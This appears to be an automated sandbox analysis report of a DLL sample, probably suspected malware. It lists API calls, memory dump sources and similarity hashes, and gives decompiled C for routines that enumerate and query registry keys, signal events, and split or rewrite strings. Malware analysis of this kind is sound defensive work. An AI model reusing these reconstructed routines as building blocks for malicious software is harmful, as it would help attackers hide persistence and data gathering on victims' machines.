                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                • String ID:
                • API String ID: 35602742-0
                • Opcode ID: 3ffdb3adc87c1349b4f8d5bcbea0e004c07767cb037ad75aaf0e4758bb3b6f4e
                • Instruction ID: 346912650c1c525103c74289b459e006f709da2997c7d707a89ad144f05d6fd7
                • Opcode Fuzzy Hash: 3ffdb3adc87c1349b4f8d5bcbea0e004c07767cb037ad75aaf0e4758bb3b6f4e
                • Instruction Fuzzy Hash: 23412179D40209EFDF21DF99C984AAEBBB8FB0A344B204469E502E7155D730DF40EB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C11900(void* __ecx, intOrPtr _a4) {
                				int* _v8;
                				int _v12;
                				int* _v16;
                				int _v20;
                				int* _v24;
                				char* _v28;
                				void* _v32;
                				long _t33;
                				char* _t35;
                				long _t39;
                				long _t42;
                				intOrPtr _t47;
                				void* _t51;
                				long _t53;
                
                				_t51 = __ecx;
                				_v8 = 0;
                				_v16 = 0;
                				_v12 = 0;
                				_v24 = 0;
                				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                				_t53 = _t33;
                				if(_t53 != 0) {
                					L18:
                					return _t53;
                				}
                				_t53 = 8;
                				_t35 = E01C12114(0x104);
                				_v28 = _t35;
                				if(_t35 == 0) {
                					L17:
                					RegCloseKey(_v32);
                					goto L18;
                				}
                				_v20 = 0x104;
                				do {
                					_v16 = _v20;
                					_v12 = 0x104;
                					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                					_t53 = _t39;
                					if(_t53 != 0xea) {
                						if(_t53 != 0) {
                							L14:
                							if(_t53 == 0x103) {
                								_t53 = 0;
                							}
                							L16:
                							E01C12C11(_v28);
                							goto L17;
                						}
                						_t42 = E01C11B78(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                						_t53 = _t42;
                						if(_t53 != 0) {
                							goto L14;
                						}
                						goto L12;
                					}
                					if(_v12 <= 0x104) {
                						if(_v16 <= _v20) {
                							goto L16;
                						}
                						E01C12C11(_v24);
                						_v20 = _v16;
                						_t47 = E01C12114(_v16);
                						_v24 = _t47;
                						if(_t47 != 0) {
                							L6:
                							_t53 = 0;
                							goto L12;
                						}
                						_t53 = 8;
                						goto L16;
                					}
                					_v8 = _v8 + 1;
                					goto L6;
                					L12:
                				} while (WaitForSingleObject( *0x1c1a2c4, 0) == 0x102);
                				goto L16;
                			}

                APIs
                • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11926
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • RegEnumKeyExA.KERNELBASE(?,?,?,01C161AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01C161AC), ref: 01C1196D
                • WaitForSingleObject.KERNEL32(00000000,?,?,?,01C161AC,?,01C161AC,?,?,?,?,?,01C161AC,?), ref: 01C119DA
                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11A02
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                • String ID:
                • API String ID: 3664505660-0
                • Opcode ID: 6f115653c2daeb94699f441d42657a81c36530139f5828d3bda292eebc7c212d
                • Instruction ID: 66930933afbad19f604409eab6fae93e85d15f81792c4d231d047c14f8bdb169
                • Opcode Fuzzy Hash: 6f115653c2daeb94699f441d42657a81c36530139f5828d3bda292eebc7c212d
                • Instruction Fuzzy Hash: 83318376C8015AFBDF219FE9CC459EEFFB9FB56300F144166E621B2154D2748A40EB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SysAllocString.OLEAUT32(80000002), ref: 01C12C84
                • SysAllocString.OLEAUT32(01C11C26), ref: 01C12CC7
                • SysFreeString.OLEAUT32(00000000), ref: 01C12CDB
                • SysFreeString.OLEAUT32(00000000), ref: 01C12CE9
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 67d40ef1ae76db2a0f975a166b1a117cdd51057cb121d57c17cc40ff188ff0ef
                • Instruction ID: 9379056488c49d2a7b150fa3b1f1412fad6f5f024a5144b42ad702d853f4cabc
                • Opcode Fuzzy Hash: 67d40ef1ae76db2a0f975a166b1a117cdd51057cb121d57c17cc40ff188ff0ef
                • Instruction Fuzzy Hash: 10314A7594014AEFDB01DFD8C8D08EE7BB4BF49340B20802EEA0A97214E771DA85DF61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E01C1611C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t20;
                				void* _t26;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t20 = E01C12031(__ecx,  &_v32); // executed
                				_t38 = _t20;
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t23 =  &(_t39[1]);
                						if(_t39[1] != 0) {
                							E01C15E26(_t23);
                						}
                					}
                					return _t38;
                				}
                				_t26 = E01C13B1B(0x40,  &_v16); // executed
                				if(_t26 != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x1c1a304, 1, 0,  *0x1c1a3a4);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8); // executed
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E01C11900(_t36); // executed
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E01C11B78(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E01C173B2(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E01C157E8( &_v32, _t39);
                					goto L13;
                				}
                			}

                APIs
                • CreateEventA.KERNEL32(01C1A304,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 01C1616D
                • SetEvent.KERNEL32(00000000), ref: 01C1617A
                • Sleep.KERNELBASE(00000BB8), ref: 01C16185
                • CloseHandle.KERNEL32(00000000), ref: 01C1618C
                  • Part of subcall function 01C11900: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11926
                  • Part of subcall function 01C11900: RegEnumKeyExA.KERNELBASE(?,?,?,01C161AC,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01C161AC), ref: 01C1196D
                  • Part of subcall function 01C11900: WaitForSingleObject.KERNEL32(00000000,?,?,?,01C161AC,?,01C161AC,?,?,?,?,?,01C161AC,?), ref: 01C119DA
                  • Part of subcall function 01C11900: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01C161AC,?), ref: 01C11A02
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                • String ID:
                • API String ID: 891522397-0
                • Opcode ID: 3228944fe5720436add95bd9879e9f65e77ef4bf7932fcf60236e14485d42253
                • Instruction ID: 6d68bdd2a6d43b269b795aa420e3bb9024077497218b329c28a8e2eb68a559fd
                • Opcode Fuzzy Hash: 3228944fe5720436add95bd9879e9f65e77ef4bf7932fcf60236e14485d42253
                • Instruction Fuzzy Hash: E221DA73980229EFDF20AFE8C8809DE777DBF17254B154425EB12A7109D774DA41E760
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C155E9(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                				long _t26;
                				intOrPtr* _t38;
                				char* _t42;
                				long _t43;
                
                				if(_a4 == 0) {
                					L2:
                					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                					_t43 = _t26;
                					if(_t43 == 0) {
                						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                						if(_a4 == 0) {
                							_t43 = 0xe8;
                						} else {
                							_t42 = E01C12114(_a4);
                							if(_t42 == 0) {
                								_t43 = 8;
                							} else {
                								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                								if(_t43 != 0) {
                									E01C12C11(_t42);
                								} else {
                									 *_a20 = _t42;
                									_t38 = _a24;
                									if(_t38 != 0) {
                										 *_t38 = _a4;
                									}
                								}
                							}
                						}
                						RegCloseKey(_a12);
                					}
                					L12:
                					return _t43;
                				}
                				_t43 = E01C11863(_a4, _a8, _a12, _a16, _a20, _a24);
                				if(_t43 == 0) {
                					goto L12;
                				}
                				goto L2;
                			}

                APIs
                • RegOpenKeyW.ADVAPI32(80000002,02179BFE,02179BFE), ref: 01C15622
                • RegQueryValueExW.KERNELBASE(02179BFE,?,00000000,80000002,00000000,00000000,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE,80000002), ref: 01C15644
                • RegQueryValueExW.ADVAPI32(02179BFE,?,00000000,80000002,00000000,00000000,00000000,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE), ref: 01C15669
                • RegCloseKey.ADVAPI32(02179BFE,?,01C11C57,3D01C190,80000002,01C161AC,00000000,01C161AC,?,02179BFE,80000002,00000000,?), ref: 01C15699
                  • Part of subcall function 01C11863: SafeArrayDestroy.OLEAUT32(00000000), ref: 01C118E8
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                • String ID:
                • API String ID: 486277218-0
                • Opcode ID: db982d72bbccc6c3aa617c232493d1b47fb8ad6ec115259dfa3362e16bd2954a
                • Instruction ID: 2b45ff7bcb2b3d86305ec519f5309cb6545bd1d428d12d6de27dc40ca1ec330f
                • Opcode Fuzzy Hash: db982d72bbccc6c3aa617c232493d1b47fb8ad6ec115259dfa3362e16bd2954a
                • Instruction Fuzzy Hash: 682130B244025EFFDF129E94EC80CEE7B69FB46250B058825FE1597214D231DD60EBE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegQueryValueExA.KERNELBASE(046DE99E,?,00000000,046DE99E,00000000,046DE9AE,046DE99E,?,?,?,?,046DA359,80000001,?,046DE99E,046DE9AE), ref: 046CFA0F
                • RtlAllocateHeap.NTDLL(00000000,046DE9AE,00000000), ref: 046CFA26
                • HeapFree.KERNEL32(00000000,00000000,?,046DA359,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046CFA41
                • RegQueryValueExA.KERNELBASE(046DE99E,?,00000000,046DE99E,00000000,046DE9AE,?,046DA359,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001), ref: 046CFA60
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateFree
                • String ID:
                • API String ID: 4267586637-0
                • Opcode ID: 3060edd133b235bbebf8c90aa65393fc63480cdddc4cea3f7f178fbf4a1f79de
                • Instruction ID: 78c365829043d2a7de83777a4d5fe8b6853c916e37175cee6cb9fc4494b3b699
                • Opcode Fuzzy Hash: 3060edd133b235bbebf8c90aa65393fc63480cdddc4cea3f7f178fbf4a1f79de
                • Instruction Fuzzy Hash: 9D114FB6500118FFDB12DF85DC84CEEBFBDEB88750B10406AF901A7250E6716E51DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDE5
                • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDF0
                • _wcsupr.NTDLL ref: 046CFDFD
                • lstrlenW.KERNEL32(00000000), ref: 046CFE05
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                • String ID:
                • API String ID: 2533608484-0
                • Opcode ID: d1245944672891463d6467e5e7f6c3a0c918930b6a1bc9d713681a50551f0b6b
                • Instruction ID: 3d070810176818f2df2ae7af4c5351c4a15198ec134e5dc3d46341523a17d1ff
                • Opcode Fuzzy Hash: d1245944672891463d6467e5e7f6c3a0c918930b6a1bc9d713681a50551f0b6b
                • Instruction Fuzzy Hash: A7F05931201212BFA3227E326C8CE7F16ADEF99BA5B10092CF401DB181FF69EC0141A4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046E3A54
                  • Part of subcall function 046D87CD: RtlEnterCriticalSection.NTDLL(00000000), ref: 046D87D9
                  • Part of subcall function 046D87CD: CloseHandle.KERNEL32(?), ref: 046D87E7
                  • Part of subcall function 046D87CD: RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D8803
                • CloseHandle.KERNEL32(?), ref: 046E3A62
                • InterlockedDecrement.KERNEL32(046EE0DC), ref: 046E3A71
                  • Part of subcall function 046CE024: SetEvent.KERNEL32(0000043C,046E3A8C), ref: 046CE02E
                  • Part of subcall function 046CE024: CloseHandle.KERNEL32(0000043C), ref: 046CE043
                  • Part of subcall function 046CE024: HeapDestroy.KERNELBASE(048A0000), ref: 046CE053
                • RtlExitUserThread.NTDLL(00000000), ref: 046E3A8D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                • String ID:
                • API String ID: 1141245775-0
                • Opcode ID: ac2b44390b75d131e9b210a69094fcf24c7627ac103cc68a9c25356bd6d8dfcc
                • Instruction ID: 53f460b9dd5054b134341dc5c1cab923bdba8e863e2812f59c60c598352ae3e9
                • Opcode Fuzzy Hash: ac2b44390b75d131e9b210a69094fcf24c7627ac103cc68a9c25356bd6d8dfcc
                • Instruction Fuzzy Hash: B6F04434541204AFE7056F6AD80DA7A3BF8EB45730B100218F521A73C0FA79AD418BA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046C3B3F
                • memcpy.NTDLL ref: 046C3B67
                  • Part of subcall function 046E3E7D: NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
                  • Part of subcall function 046E3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                  • Part of subcall function 046E3E7D: SetLastError.KERNEL32(00000000), ref: 046E3EBC
                • GetLastError.KERNEL32(00000010,00000218,046E6D9D,00000100,?,00000318,00000008), ref: 046C3B7E
                • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,046E6D9D,00000100), ref: 046C3C61
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                • String ID:
                • API String ID: 685050087-0
                • Opcode ID: 61f518e0d114ccf5d1b277112e40f79593a4f5e9095f360c59aad5ddd112a252
                • Instruction ID: 85969e21767c8c37ee0981f4bfb0b8efcca7d6c42d4ea20f6a754282b6888aa8
                • Opcode Fuzzy Hash: 61f518e0d114ccf5d1b277112e40f79593a4f5e9095f360c59aad5ddd112a252
                • Instruction Fuzzy Hash: B94192B1644305AFD720DF25CC41FABB7E8EB98314F00892DF999C6290F730E5558BA6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 18%
                			E01C11442(void* __esi) {
                				signed int _v8;
                				long _v12;
                				char _v16;
                				long* _v20;
                				long _t36;
                				long* _t47;
                				intOrPtr* _t62;
                				intOrPtr* _t63;
                				char* _t64;
                
                				_t36 =  *((intOrPtr*)(__esi + 0x28));
                				_t62 = __esi + 0x2c;
                				_v16 = 0;
                				 *_t62 = 0;
                				_v12 = _t36;
                				if(_t36 != 0) {
                					L12:
                					return _v12;
                				}
                				_v8 = 4;
                				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
                				if(_t36 == 0) {
                					L11:
                					_v12 = GetLastError();
                					goto L12;
                				}
                				_push( &_v16);
                				_push( &_v8);
                				_push(_t62);
                				_t63 = __imp__; // 0x6f99fd20
                				_push(0);
                				_push(0x20000013);
                				_push( *((intOrPtr*)(__esi + 0x18)));
                				if( *_t63() == 0) {
                					goto L11;
                				} else {
                					_v16 = 0;
                					_v8 = 0;
                					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                					_t47 = E01C12114(_v8 + 2);
                					_v20 = _t47;
                					if(_t47 == 0) {
                						_v12 = 8;
                					} else {
                						_push( &_v16);
                						_push( &_v8);
                						_push(_t47);
                						_push(0);
                						_push(0x16);
                						_push( *((intOrPtr*)(__esi + 0x18)));
                						if( *_t63() == 0) {
                							_v12 = GetLastError();
                						} else {
                							_v8 = _v8 >> 1;
                							 *((short*)(_v20 + _v8 * 2)) = 0;
                							_t64 = E01C12114(_v8 + 1);
                							if(_t64 == 0) {
                								_v12 = 8;
                							} else {
                								wcstombs(_t64, _v20, _v8 + 1);
                								 *(__esi + 0xc) = _t64;
                							}
                						}
                						E01C12C11(_v20);
                					}
                					goto L12;
                				}
                			}

                APIs
                • GetLastError.KERNEL32 ref: 01C11534
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • wcstombs.NTDLL ref: 01C11502
                • GetLastError.KERNEL32 ref: 01C11518
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$AllocateHeapwcstombs
                • String ID:
                • API String ID: 2631933831-0
                • Opcode ID: ac003e999dc5c522cd9aea76ea414cfea4a22f153045f4c5ab80cb8599619a7f
                • Instruction ID: a34697f35dd17d98ec64a66fe183e8d18d665ab947f291d51a68d7e2db86231d
                • Opcode Fuzzy Hash: ac003e999dc5c522cd9aea76ea414cfea4a22f153045f4c5ab80cb8599619a7f
                • Instruction Fuzzy Hash: 7D312BB5940209EFDB20DFE5CC80DAEBBB8FB19304F584469E642E3254D734DB44AB20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E01C12638(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                				char _v5;
                				signed int _v12;
                				intOrPtr _v16;
                				char _t28;
                				void* _t33;
                				void* _t38;
                				void* _t45;
                				char* _t46;
                				void* _t48;
                				char* _t56;
                				char* _t57;
                				intOrPtr _t59;
                				void* _t60;
                
                				_t56 = _a4;
                				_t60 = __eax;
                				_v12 = 0xb;
                				if(_t56 != 0 && __eax != 0) {
                					_t5 = _t60 - 1; // -1
                					_t46 =  &(_t56[_t5]);
                					_t28 =  *_t46;
                					_v5 = _t28;
                					 *_t46 = 0;
                					__imp__(_a8, _t45);
                					_v16 = _t28;
                					_t57 = StrStrA(_t56, _a8);
                					if(_t57 != 0) {
                						 *_t46 = _v5;
                						_t33 = RtlAllocateHeap( *0x1c1a290, 0, _a16 + _t60); // executed
                						_t48 = _t33;
                						if(_t48 == 0) {
                							_v12 = 8;
                						} else {
                							_t58 = _t57 - _a4;
                							E01C17A9C(_t57 - _a4, _a4, _t48);
                							_t38 = E01C17A9C(_a16, _a12, _t58 + _t48);
                							_t53 = _v16;
                							_t59 = _a16;
                							E01C17A9C(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                							 *_a20 = _t48;
                							_v12 = _v12 & 0x00000000;
                							 *_a24 = _t60 - _v16 + _t59;
                						}
                					}
                				}
                				return _v12;
                			}

                APIs
                • lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 01C1266C
                • StrStrA.SHLWAPI(00000000,?), ref: 01C12679
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 01C12698
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeaplstrlen
                • String ID:
                • API String ID: 556738718-0
                • Opcode ID: 61c4598b781d091e5f6bd31df05954788a3546807ed84e50557537a210d58ca8
                • Instruction ID: dc40d89ff7da36d40a00ad70d2364d8d0179c457d4c17e0440a46fa7236bf5f7
                • Opcode Fuzzy Hash: 61c4598b781d091e5f6bd31df05954788a3546807ed84e50557537a210d58ca8
                • Instruction Fuzzy Hash: DE215E3664025AEFCF11CF6CC884B9EBFB5EF96254F148195E804AB349C734DA15DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046E41CF: lstrlen.KERNEL32(?,00000000,046E249E,00000027,046EE268,?,00000000,?,?,046E249E,?,00000001,?,046DA7DD,00000000,?), ref: 046E4205
                  • Part of subcall function 046E41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 046E4229
                  • Part of subcall function 046E41CF: lstrcat.KERNEL32(00000000,00000000), ref: 046E4231
                • RegOpenKeyExA.KERNELBASE(046CF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,046CF629,80000001,?,046DE99E), ref: 046DA324
                • RegOpenKeyExA.ADVAPI32(046CF629,046CF629,00000000,00020019,80000001,?,046CF629,80000001,?,046DE99E), ref: 046DA33A
                • RegCloseKey.ADVAPI32(80000001,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046DA383
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Open$Closelstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 4131162436-0
                • Opcode ID: ef046bd967179cd5bb62b3fabedfe4b29149e0b87946b90711167cdb73a25f0f
                • Instruction ID: 81156a0e7ad0896ea0334977819e3bf1a6ace6d7ada0b1a8d4a3d935b336ae2e
                • Opcode Fuzzy Hash: ef046bd967179cd5bb62b3fabedfe4b29149e0b87946b90711167cdb73a25f0f
                • Instruction Fuzzy Hash: 3E214D71900219BFDB01DFE5DD81CAEBBBDEB19344B11406AE504E7251F771AE44DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 47%
                			E01C11590(char* _a4, char** _a8) {
                				char* _t7;
                				char* _t11;
                				char* _t14;
                				char* _t16;
                				char* _t17;
                				char _t18;
                				signed int _t20;
                				signed int _t22;
                
                				_t16 = _a4;
                				_push(0x20);
                				_t20 = 1;
                				_push(_t16);
                				while(1) {
                					_t7 = StrChrA();
                					if(_t7 == 0) {
                						break;
                					}
                					_t20 = _t20 + 1;
                					_push(0x20);
                					_push( &(_t7[1]));
                				}
                				_t11 = E01C12114(_t20 << 2);
                				_a4 = _t11;
                				if(_t11 != 0) {
                					StrTrimA(_t16, 0x1c192a4); // executed
                					_t22 = 0;
                					do {
                						_t14 = StrChrA(_t16, 0x20);
                						if(_t14 != 0) {
                							 *_t14 = 0;
                							do {
                								_t14 =  &(_t14[1]);
                								_t18 =  *_t14;
                							} while (_t18 == 0x20 || _t18 == 9);
                						}
                						_t17 = _a4;
                						 *(_t17 + _t22 * 4) = _t16;
                						_t22 = _t22 + 1;
                						_t16 = _t14;
                					} while (_t14 != 0);
                					 *_a8 = _t17;
                				}
                				return 0;
                			}

                Statement address column (flattened by extraction; the function body spans 0x01c11594 .. 0x01c11607)

                APIs
                • StrChrA.SHLWAPI(?,00000020,00000000,021795AC,?,?,01C121E5,?,021795AC), ref: 01C115AC
                • StrTrimA.KERNELBASE(?,01C192A4,00000002,?,01C121E5,?,021795AC), ref: 01C115CA
                • StrChrA.SHLWAPI(?,00000020,?,01C121E5,?,021795AC), ref: 01C115D5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
